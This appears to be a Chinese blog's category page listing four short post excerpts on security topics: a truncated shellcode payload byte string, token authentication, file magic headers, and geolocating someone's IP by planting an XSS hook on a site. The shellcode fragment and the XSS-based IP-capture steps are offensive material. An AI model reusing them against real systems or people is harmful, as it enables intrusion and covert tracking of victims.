各种混合内容
偷吃"游"的阿彪
这个作者很懒,什么都没留下…
展开
-
payload
"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\x原创 2023-10-29 15:28:05 · 149 阅读 · 0 评论 -
token
①客户端使用用户名和密码请求登录。②服务端收到请求,验证用户名和密码。③验证成功后,服务端会生成一个token,然后把这个token发送给客户端。④客户端收到token后把它存储起来,可以放在cookie或者Local Storage(本地存储)里。⑤客户端每次向服务端发送请求的时候都需要带上服务端发给的token。⑥服务端收到请求,然后去验证客户端请求里面带着token,如果验证成功,就向客户端返回请求的数据。原创 2023-08-05 22:28:31 · 840 阅读 · 2 评论 -
文件头大全
txt 文件(txt) , 文件头:Unicode:feff / Unicode big endian:fffe / UTF-8:efbbbf /ANSI编码是没有文件头的。GIF (gif) 文件头:47494638 文件尾:00 3B。ZIP Archive (zip), 文件头:504B0304 文件尾:50 4B。原创 2023-07-31 18:28:05 · 1599 阅读 · 0 评论 -
IP定位方法
①首先要找到一个可以进行xss的网站,这边用的是xss靶场进行测试②利用xss平台对该网站进行注入显示-项目代码 将其引用的xss诸如点③外部引用代码,触发xss之后,在xss平台会有记录显示目标的ip地址④然后用八九网进行定位就可以了。原创 2023-07-21 01:26:16 · 461 阅读 · 0 评论